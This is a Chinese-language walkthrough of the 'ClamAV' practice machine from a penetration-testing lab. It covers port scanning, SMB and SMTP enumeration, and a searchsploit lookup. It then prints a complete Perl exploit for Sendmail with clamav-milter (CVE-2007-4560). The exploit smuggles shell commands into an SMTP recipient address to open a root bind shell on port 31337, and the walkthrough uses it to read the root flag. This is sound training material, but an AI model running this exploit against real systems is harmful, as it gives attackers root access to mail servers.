ClamAV
第8台,Linux系统,难度Easy,名称 ClamAV
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -n -r --min-rate=3500 -sSV 192.168.193.42 -T4
[sudo] xavier 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-17 14:18 CST
Nmap scan report for 192.168.193.42
Host is up (0.16s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
全端口扫描,补充端口如下:
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
|
漏洞情况:
1
|
Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation
|
Web
打开80端口,能看到字符串
1
|
01101001 01100110 01111001 01101111 01110101 01100100 01101111 01101110 01110100 01110000 01110111 01101110 01101101 01100101 01110101 01110010 01100001 01101110 00110000 00110000 01100010
|
二进制解码后就是:
SMB
探测SMB空口令成功
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
┌──(xavier㉿kali)-[~]
└─$ crackmapexec smb 192.168.193.42 -u '' -p ''
SMB 192.168.193.42 445 NONE [*] Unix (name:) (domain:) (signing:False) (SMBv1:True)
SMB 192.168.193.42 445 NONE [+] \:
┌──(xavier㉿kali)-[~]
└─$ crackmapexec smb 192.168.193.42 -u '' -p '' --shares
SMB 192.168.193.42 445 NONE [*] Unix (name:) (domain:) (signing:False) (SMBv1:True)
SMB 192.168.193.42 445 NONE [+] \:
SMB 192.168.193.42 445 NONE [+] Enumerated shares
SMB 192.168.193.42 445 NONE Share Permissions Remark
SMB 192.168.193.42 445 NONE ----- ----------- ------
SMB 192.168.193.42 445 NONE print$ Printer Drivers
SMB 192.168.193.42 445 NONE IPC$ IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
SMB 192.168.193.42 445 NONE ADMIN$ IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig)
|
SMTP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -n -r --min-rate=3500 -sSV 192.168.193.42 -T4 -p 25 --script=smtp*
[sudo] xavier 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-17 14:40 CST
Nmap scan report for 192.168.193.42
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
|_smtp-open-relay: Server is an open relay (13/16 tests)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| smtp-commands: localhost.localdomain Hello [192.168.45.174], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
Service Info: Host: localhost.localdomain; OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds
|
漏洞搜索
搜索box的名称,找到历史漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
┌──(xavier㉿kali)-[~]
└─$ searchsploit clamav
---------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------- ---------------------------------
Clam Anti-Virus ClamAV 0.88.x - UPX Compressed PE File Heap Buffer Ov | linux/dos/28348.txt
ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference | linux/remote/30291.txt
ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow | linux/remote/4862.py
ClamAV < 0.102.0 - 'bytecode_vm' Code Execution | linux/local/47687.py
ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC) | multiple/dos/7330.c
ClamAV Daemon 0.65 - UUEncoded Message Denial of Service | linux/dos/23667.txt
ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit) | linux/remote/16924.rb
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Meta | multiple/remote/9913.rb
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
---------------------------------------------------------------------- ---------------------------------
Paper Title | Path
---------------------------------------------------------------------- ---------------------------------
[Azerbaijan] ClamAV Bypassing | docs/azerbaijan/31685-[azerbaija
---------------------------------------------------------------------- ---------------------------------
|
1
2
3
4
5
6
7
8
9
|
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/8-ClamAV]
└─$ searchsploit -m 4761
Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/4761
Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
Codes: CVE-2007-4560
Verified: True
File Type: ASCII text
Copied to: /home/xavier/Desktop/OSCP/PG_Practice/8-ClamAV/4761.pl
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# milw0rm.com [2007-12-21]
|
该脚本执行后,会用root权限执行一个/bin/sh ,在31337端口进行监听
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/8-ClamAV]
└─$ perl 4761.pl 192.168.193.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.193.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sun, 17 Dec 2023 07:11:16 -0500; (No UCE/UBE) logging access from: [192.168.45.174](FAIL)-[192.168.45.174]
250-localhost.localdomain Hello [192.168.45.174], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 3BHCBGXD005199 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/8-ClamAV]
└─$ nc 192.168.193.42 31337
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
09d91935b96ac1aa8ce31d30e77c9978
|
Xavier
收录于 靶场